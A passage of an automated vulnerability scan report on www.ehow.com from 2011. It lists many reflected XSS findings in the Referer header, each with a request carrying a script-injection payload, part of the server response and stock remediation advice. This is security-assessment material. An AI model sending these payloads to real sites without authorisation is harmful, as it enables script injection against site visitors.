This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_4028_preparing-flu-season.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=50b94</script><script>alert(1)</script>5e5d8da7a42
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f21b</script><script>alert(1)</script>3693e48b6e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_4127_home-alarm-system-guide.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9f21b</script><script>alert(1)</script>3693e48b6e0
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:37 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=4127; expires=Thu, 02-Feb-2012 15:16:37 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41825
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Home Alarm System Guide | eHow.com </title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0ca6</script><script>alert(1)</script>581ac46251c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_429_all-flu.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=f0ca6</script><script>alert(1)</script>581ac46251c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee024</script><script>alert(1)</script>fab642986c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_4989_photo-sharing-101.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ee024</script><script>alert(1)</script>fab642986c6
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:51 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=4989; expires=Thu, 02-Feb-2012 15:16:51 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43021
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f643</script><script>alert(1)</script>ab7ae63df3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_49_treating-colds-flus.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=5f643</script><script>alert(1)</script>ab7ae63df3
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 964df</script><script>alert(1)</script>ee96ee1016b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_5023_jog-lose-weight.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=964df</script><script>alert(1)</script>ee96ee1016b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c3e0</script><script>alert(1)</script>94ff7919eca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_689_black-white-photos.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=3c3e0</script><script>alert(1)</script>94ff7919eca
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:53 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=689; expires=Thu, 02-Feb-2012 15:16:53 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53252
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Take Black and White Photos - Taking Black and ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3bef</script><script>alert(1)</script>29fd0f6f1e2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_745_capture-enduring-wedding-photos.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=d3bef</script><script>alert(1)</script>29fd0f6f1e2
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99a28</script><script>alert(1)</script>52e623cc62d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_7853_floor-fountains-guide.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=99a28</script><script>alert(1)</script>52e623cc62d
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:34 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=7853; expires=Thu, 02-Feb-2012 15:16:34 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40979
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14171</script><script>alert(1)</script>ec64a979418 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_7992_floor-water-fountains-101.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=14171</script><script>alert(1)</script>ec64a979418
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:32 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=7992; expires=Thu, 02-Feb-2012 15:16:32 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38141
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14963</script><script>alert(1)</script>b358eea976 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_8016_outdoor-garden-fountains-guide.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=14963</script><script>alert(1)</script>b358eea976
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:07 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=8016; expires=Thu, 02-Feb-2012 15:16:07 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40923
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 506a1</script><script>alert(1)</script>22a7977a460 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_8047_water-garden-fountains-101.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=506a1</script><script>alert(1)</script>22a7977a460
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb9af</script><script>alert(1)</script>afc6118e907 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /toys-and-games/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=cb9af</script><script>alert(1)</script>afc6118e907
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72435
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Toys & Games - How To Information | eHow.com</tit ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 512f2</script><script>alert(1)</script>feeb99e195a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /unavailable.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=512f2</script><script>alert(1)</script>feeb99e195a
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23094
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Browse How to Videos and How to Articles | ehow.c ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dd94</script><script>alert(1)</script>26c420d0b66 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /us-travel/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9dd94</script><script>alert(1)</script>26c420d0b66
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75108
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>US Travel - How To Information | eHow.com</title> ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 554d2</script><script>alert(1)</script>ca7a2c01173 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /vacations-and-travel-planning/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=554d2</script><script>alert(1)</script>ca7a2c01173
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75405
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Vacations & Travel Planning - How To Information ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a348</script><script>alert(1)</script>3f3991beec1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video_6598099_make-sugar-spice-scrub.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9a348</script><script>alert(1)</script>3f3991beec1
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:01 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83517
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Sugar & Spice Scrub: Gorgeously Gre ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0e92</script><script>alert(1)</script>0488b8fbc31 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video_6976779_sensational-snacks.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
